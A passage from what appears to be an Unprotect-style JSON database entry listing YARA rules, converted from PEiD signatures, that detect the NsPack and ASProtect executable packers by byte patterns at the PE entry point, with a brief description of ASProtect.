2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V33_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 
80 38 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_1x2x_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? 
FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_34_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 196,
            "unprotect_id": "U1415",
            "name": "AsProtect",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ASProtect is a multifunctional EXE packing tool designed for software developers to protect 32-bit applications, with a built-in application copy-protection system.\r\n\r\nIt provides software compression together with methods and tools for protecting software from unauthorized copying, analysis, disassemblers and debuggers.\r\n\r\nASProtect 32 also provides enhanced handling of registration keys and the ability to build a single application that changes its functionality or expiration depending on the particular key entered.",
            "resources": "http://www.aspack.com/asprotect32.html",
            "tags": "asprotect",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 112,
                    "key": "yara_detect_asprotect",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Asprotect",
                    "rule": "rule ASProtect_v123_RC1: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_130824_beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? 
C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v132: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_12_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = {}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n        $b = {}\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 }\r\n        $b = { 60 E9 ?? 05 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_10_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 90 5D 81 ED ?? ?? ?? 00 BB ?? ?? ?? 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_V2X_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 
8D 5D ?? E8 ?? ?? ?? ?? 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_MTE_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 